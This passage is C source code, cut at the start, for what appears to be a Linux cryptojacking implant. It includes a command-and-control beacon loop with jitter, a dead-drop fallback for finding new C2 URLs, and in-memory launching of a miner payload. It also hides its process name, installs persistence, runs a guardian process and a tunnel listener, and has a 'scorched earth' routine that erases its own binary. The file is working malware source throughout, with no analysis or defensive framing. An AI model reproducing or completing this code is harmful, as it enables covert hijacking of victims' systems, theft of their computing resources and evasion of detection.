    close(fd);
}

static void scorched_earth(void) {
    g_running = 0;

    if (g_miner_pid > 0) {
        kill(g_miner_pid, SIGKILL);
        waitpid(g_miner_pid, NULL, 0);
    }

    if (g_guardian > 0)
        kill(g_guardian, SIGKILL);

    remove_persistence();

    if (G.self_path[0]) {
        overwrite_file((char *)G.self_path);
        unlink((char *)G.self_path);
    }

    _exit(0);
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Command Handlers
 * ═══════════════════════════════════════════════════════════════════════════ */

static void handle_payload_delivery(uint8_t *payload, size_t payload_len) {
    if (!payload || payload_len == 0 || g_miner_pid > 0) return;

    g_miner_pid = phantom_exec(payload, payload_len, G.proc_name);
    if (g_miner_pid > 0) {
        if (fork() == 0) {
            govern(g_miner_pid);
            _exit(0);
        }
    }
}

static void handle_kill_mining(void) {
    if (g_miner_pid > 0) {
        kill(g_miner_pid, SIGKILL);
        waitpid(g_miner_pid, NULL, 0);
        g_miner_pid = -1;
    }
}

/* ═══════════════════════════════════════════════════════════════════════════
 * Main Orchestrator
 * ═══════════════════════════════════════════════════════════════════════════ */

static void record_self_path(void) {
    ssize_t path_len = readlink("/proc/self/exe",
                                (char *)G.self_path,
                                sizeof(G.self_path) - 1);
    if (path_len > 0)
        G.self_path[path_len] = '\0';
    else
        G.self_path[0] = '\0';
}

static void daemonize(void) {
    if (fork() != 0) _exit(0);
    setsid();
    if (fork() != 0) _exit(0);
}

static unsigned int calculate_beacon_sleep_us(void) {
    float jitter = 1.0f + G.beacon_jitter *
        (2.0f * ((float)rand() / RAND_MAX) - 1.0f);
    /* Return microseconds for usleep() — beacon_base_sec * 1e6 * jitter */
    return (unsigned int)((float)G.beacon_base_sec * 1000000.0f * jitter);
}

int main(int argc, char **argv, char **envp) {
    if (unseal() != 0) _exit(1);
    if (preflight() != 0) _exit(0);

    // Capture HOME before we clobber the environment with shed_skin
    char *env_home = getenv("HOME");
    char home_path[MAX_PATH];
    if (env_home) {
        strncpy(home_path, env_home, sizeof(home_path) - 1);
        home_path[sizeof(home_path) - 1] = '\0';
    } else {
        home_path[0] = '\0';
    }

    record_self_path();
    silence();
    shed_skin(argc, argv, envp);

    /* Restore minimal environment for child processes (popen, system) */
    setenv("PATH", "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", 1);
    if (home_path[0]) setenv("HOME", home_path, 1);

    daemonize();
    entrench(home_path[0] ? home_path : NULL);

    curl_global_init(CURL_GLOBAL_SSL);
    srand((unsigned int)time(NULL) ^ (unsigned int)getpid());

    int heartbeat_fd = spawn_guardian((char *)G.self_path);

    pthread_t tunnel_tid;
    if (pthread_create(&tunnel_tid, NULL, tunnel_listener, NULL) != 0)
        tunnel_tid = 0;
    else
        pthread_detach(tunnel_tid);

    uint8_t *payload = NULL;
    size_t   payload_len = 0;
    char     cmd = 0;
    int      c2_failures = 0;

    while (g_running) {
        int rc = beacon_cycle(&payload, &payload_len, &cmd);

        if (rc != 0) {
            c2_failures++;
            if (c2_failures > MAX_C2_FAILURES) {
                char new_url[MAX_URL];
                if (resolve_dead_drop(new_url, sizeof(new_url)) == 0)
                    strncpy(G.c2_url, new_url, sizeof(G.c2_url) - 1);
                c2_failures = 0;
            }
        } else {
            c2_failures = 0;

            switch (cmd) {
                case 0x01:
                    handle_payload_delivery(payload, payload_len);
                    break;
                case 0x04:
                    handle_kill_mining();
                    break;
                case 0x05:
                    scorched_earth();
                    break;
            }

            if (payload) {
                free(payload);
                payload = NULL;
            }
        }

        if (heartbeat_fd >= 0)
            write(heartbeat_fd, "\x01", 1);

        usleep(calculate_beacon_sleep_us());
    }

    return 0;
}
